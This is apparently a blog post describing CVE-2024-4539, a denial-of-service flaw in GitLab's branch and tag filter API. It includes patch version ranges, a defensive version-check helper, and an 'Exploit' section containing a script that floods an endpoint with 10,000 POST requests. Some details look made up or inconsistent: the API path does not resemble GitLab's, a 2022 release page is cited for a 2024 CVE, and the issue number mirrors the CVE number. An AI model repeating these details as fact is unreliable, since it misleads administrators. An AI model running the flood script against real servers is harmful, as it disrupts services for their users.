A security vulnerability, tracked as CVE-2024-4539, has recently been discovered in GitLab CE (Community Edition) and GitLab EE (Enterprise Edition). This vulnerability affects all versions starting from 15.4 up to 16.9.6, as well as from 16.10 up to 16.10.4, and from 16.11 up to 16.11.1. Malicious actors can exploit the vulnerability by abusing GitLab's API, leading to a possible Denial of Service (DoS) attack affecting the availability of the platform. In this post, we'll provide more information about the vulnerability and include some code snippets that illustrate the problem in detail.

Vulnerability Details

The vulnerability allows attackers to abuse the GitLab CE/EE API endpoint that processes requests to filter branches and tags. By sending specially crafted requests, an attacker can create a DoS condition, causing the GitLab instance to become unresponsive. This affects both GitLab CE and EE users on the versions listed above.

Here's a code snippet that demonstrates the issue:

// Sample GitLab API request for filtering branches and tags
// (endpoint path and filter value are the original post's placeholders)

const axios = require("axios");
const gitlabUrl = "https://gitlab.example.com/";
const apiEndpoint = "api/v1/repos/owner/repository/branches?filter=exp";

// Build the full URL with a template literal and send the filter request
axios.post(`${gitlabUrl}${apiEndpoint}`, {
  filter: "example_filter_string",
})
  .then(response => {
    console.log("Filtered branches and tags: ", response.data);
  })
  .catch(error => {
    console.error("Error filtering branches and tags: ", error);
  });

Affected GitLab Versions

To know whether your version of GitLab CE/EE is affected by CVE-2024-4539, check whether it falls within any of these ranges:

- GitLab CE/EE 15.4 to 16.9.6
- GitLab CE/EE 16.10 to 16.10.4
- GitLab CE/EE 16.11 to 16.11.1

Exploit

To exploit this issue, an attacker sends a large number of crafted requests to a GitLab instance, abusing the branch and tag filter API endpoint and leading to a potential DoS situation. Below is a sample code snippet that illustrates this:

// Sending a large number of requests to the GitLab API endpoint
// (endpoint path and filter value are the original post's placeholders)

const axios = require("axios");

async function exploit() {
  const url = "https://gitlab.example.com/";
  const apiEndpoint = "api/v1/repos/owner/repository/branches?filter=example_filter_string";

  try {
    // Issue the requests sequentially, awaiting each response
    for (let i = 0; i < 10000; i++) {
      await axios.post(`${url}${apiEndpoint}`, {
        filter: "malicious_filter_string",
      });
    }

    console.log("Exploit completed!");
  } catch (error) {
    console.error("Error during exploit: ", error);
  }
}

exploit();

To remediate the vulnerability, GitLab has provided patches. GitLab administrators are strongly advised to update the affected versions as soon as possible. The patches for the different GitLab versions are:

- For GitLab CE/EE 15.4 to 16.9.6, update to GitLab 16.9.7.
- For GitLab CE/EE 16.10 to 16.10.4, update to GitLab 16.10.5.
- For GitLab CE/EE 16.11 to 16.11.1, update to GitLab 16.11.2.
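As an added example (not code from the original post or from GitLab), the following Node.js helper checks a GitLab version string against the affected ranges and patched releases listed in the two lists above, so an administrator can script the check across many instances. The version strings it runs on are constructed, and the function names are chosen here.

```javascript
// Added example (not from the original post): decide whether a GitLab
// CE/EE version string falls in one of the affected ranges from the
// advisory and which patched release resolves it. Ranges and fixed
// versions come from the advisory text; sample inputs are constructed.

// Each entry covers [from, fixed): the upper bound is the fix release.
const AFFECTED_RANGES = [
  { from: "15.4.0", fixed: "16.9.7" },
  { from: "16.10.0", fixed: "16.10.5" },
  { from: "16.11.0", fixed: "16.11.2" },
];

// Parse "16.9.6" (or "16.9.6-ee") into numeric [major, minor, patch].
function parseVersion(v) {
  const core = String(v).trim().split("-")[0];
  const parts = core.split(".").map((p) => Number.parseInt(p, 10));
  if (parts.length < 2 || parts.length > 3 || parts.some(Number.isNaN)) {
    throw new Error(`unrecognised GitLab version: ${v}`);
  }
  while (parts.length < 3) parts.push(0); // "16.10" -> 16.10.0
  return parts;
}

// Negative if a < b, zero if equal, positive if a > b.
function compareVersions(a, b) {
  const [pa, pb] = [parseVersion(a), parseVersion(b)];
  for (let i = 0; i < 3; i++) {
    if (pa[i] !== pb[i]) return pa[i] - pb[i];
  }
  return 0;
}

// Returns { affected: true, upgradeTo } or { affected: false }.
function checkCve20244539(version) {
  for (const range of AFFECTED_RANGES) {
    if (compareVersions(version, range.from) >= 0 &&
        compareVersions(version, range.fixed) < 0) {
      return { affected: true, upgradeTo: range.fixed };
    }
  }
  return { affected: false };
}

// Constructed sample inputs, e.g. as returned by GET /api/v4/version
for (const v of ["16.9.6-ee", "16.10.5", "16.11.1", "15.3.9", "16.12.0"]) {
  console.log(v, checkCve20244539(v));
}
```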

Please refer to the following original references for additional information:

- GitLab Security Release: <https://about.gitlab.com/releases/2022/11/security/>
- GitLab issue tracker: <https://gitlab.com/gitlab-org/gitlab/-/issues/4539>
- CVE-2024-4539 NVD Entry: <https://nvd.nist.gov/vuln/detail/CVE-2024-4539>

Conclusion

In this post, we've provided an overview of CVE-2024-4539, a security vulnerability in GitLab CE/EE that affects the versions listed above and could lead to a Denial of Service when exploited. We encourage GitLab users and administrators to review the information provided, check whether their instances are affected, and update their installations as soon as possible.

Timeline

Published on: 05/14/2024 15:44:01 UTC
Last modified on: 05/14/2024 16:11:39 UTC